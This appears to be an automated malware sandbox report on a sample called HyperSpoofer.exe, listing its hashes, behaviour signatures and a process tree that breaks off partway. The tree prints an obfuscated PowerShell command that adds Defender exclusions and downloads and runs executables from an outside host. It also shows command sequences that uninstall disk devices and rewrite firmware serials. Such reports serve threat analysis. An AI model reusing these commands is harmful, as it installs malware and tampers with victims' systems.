Resubmissions

03-08-2024 01:39

240803-b22z2stbpg 10

03-08-2024 01:35

240803-bzp8gatbjb 10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2024 01:35

General

  • Target

    HyperSpoofer.exe

  • Size

    2.5MB

  • MD5

    d90e6ad485a94bf54e434b58d3f5ac5c

  • SHA1

    97d3d35fb31c029febce56204d2f6f2753dbd284

  • SHA256

    b55454760356e6ec102c5b3b999488973f8b7baed94eddf9e11be838f0c6901e

  • SHA512

    aabea05a6015a47da10131599ae12ecd41a0f84e49c252ae1ea99e333e233efd1a62619bbd6379d295fdd3e3c8551b10d76021d27e55c56e5592866091caf9c6

  • SSDEEP

    49152:75UzLWWq+T82bgnJslTuOFKtRoQrNRD73g71+20Z5UbRrthRkeq:75xWq+T82qc5QjNJ3sCUdnM

Malware Config

Signatures

  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 2 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 30 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Maps connected drives based on registry 3 TTPs 64 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 25 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:400
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcwB6AGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABuAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzAGQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBpAHQAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAeAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAGUAcABmACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB2AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABtAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAYgBkAHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAHoAZwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABnAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBuAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBkAGYAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwAvAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwAsACAAPAAjAGEAYwBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBpAHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBoAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAKQA8ACMAeABuAG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgBjAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApADwAIwBzAGYAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAG4AaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBoAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAGUAcgBoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAZgB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwApADwAIwBtAG4AZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB6AGQAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQBlAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAPAAjAHIAcAB6ACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4520
      • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
        "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: T2ZN-G119
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3092
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: T2ZN-G119
            5⤵
            • Executes dropped EXE
            PID:552
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3424
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3408
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2636
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4964
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5080
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1088
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4356
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:408
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2900
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3000
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2580
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2924
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4840
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3764
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2392
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
            PID:3188
            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 213HP-TRGT9331AB
              5⤵
              • Executes dropped EXE
              PID:3108
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
            4⤵
              PID:1944
              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2213HP-TRGT9331RV
                5⤵
                • Executes dropped EXE
                PID:1912
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
              4⤵
                PID:4252
                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8216HP-TRGT20080SG
                  5⤵
                  • Executes dropped EXE
                  PID:3156
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                4⤵
                  PID:1816
                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                    5⤵
                    • Executes dropped EXE
                    PID:432
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                  4⤵
                    PID:3980
                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5216HP-TRGT20080SL
                      5⤵
                      • Executes dropped EXE
                      PID:1472
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                    4⤵
                      PID:956
                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4220HP-TRGT30828FA
                        5⤵
                        • Executes dropped EXE
                        PID:3956
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                      4⤵
                        PID:1656
                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6220HP-TRGT30828FU
                          5⤵
                          • Executes dropped EXE
                          PID:4864
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                        4⤵
                          PID:3052
                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3220HP-TRGT30828DQ
                            5⤵
                            • Executes dropped EXE
                            PID:2040
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                          4⤵
                            PID:1960
                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7220HP-TRGT30828MST
                              5⤵
                              • Executes dropped EXE
                              PID:3856
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                            4⤵
                              PID:1564
                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                5⤵
                                • Executes dropped EXE
                                PID:3860
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                              4⤵
                                PID:2544
                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 239HP-TRGT29782AB
                                  5⤵
                                  • Executes dropped EXE
                                  PID:3380
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                4⤵
                                  PID:4020
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    5⤵
                                      PID:3856
                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2239HP-TRGT29782RV
                                      5⤵
                                      • Executes dropped EXE
                                      PID:4136
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                    4⤵
                                      PID:3036
                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8239HP-TRGT29782SG
                                        5⤵
                                        • Executes dropped EXE
                                        PID:1668
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                      4⤵
                                        PID:408
                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                          5⤵
                                          • Executes dropped EXE
                                          PID:376
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                        4⤵
                                          PID:2648
                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5239HP-TRGT29782SL
                                            5⤵
                                            • Executes dropped EXE
                                            PID:4492
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                          4⤵
                                            PID:4376
                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4243HP-TRGT7763FA
                                              5⤵
                                              • Executes dropped EXE
                                              PID:648
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                            4⤵
                                              PID:4920
                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6243HP-TRGT7763FU
                                                5⤵
                                                • Executes dropped EXE
                                                PID:4692
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                              4⤵
                                                PID:632
                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3243HP-TRGT7763DQ
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:4364
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                4⤵
                                                  PID:4532
                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7243HP-TRGT7763MST
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:5116
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                  4⤵
                                                    PID:1220
                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:3408
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                                                    4⤵
                                                      PID:2768
                                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 259HP-TRGT28737AB
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:4688
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                                      4⤵
                                                        PID:4704
                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2259HP-TRGT28737RV
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:4480
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                                        4⤵
                                                          PID:1904
                                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8259HP-TRGT28737SG
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:1748
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                          4⤵
                                                            PID:396
                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:3772
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                                            4⤵
                                                              PID:3068
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                5⤵
                                                                  PID:4692
                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5259HP-TRGT28737SL
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:1548
                                                              • C:\Windows\System32\cmd.exe
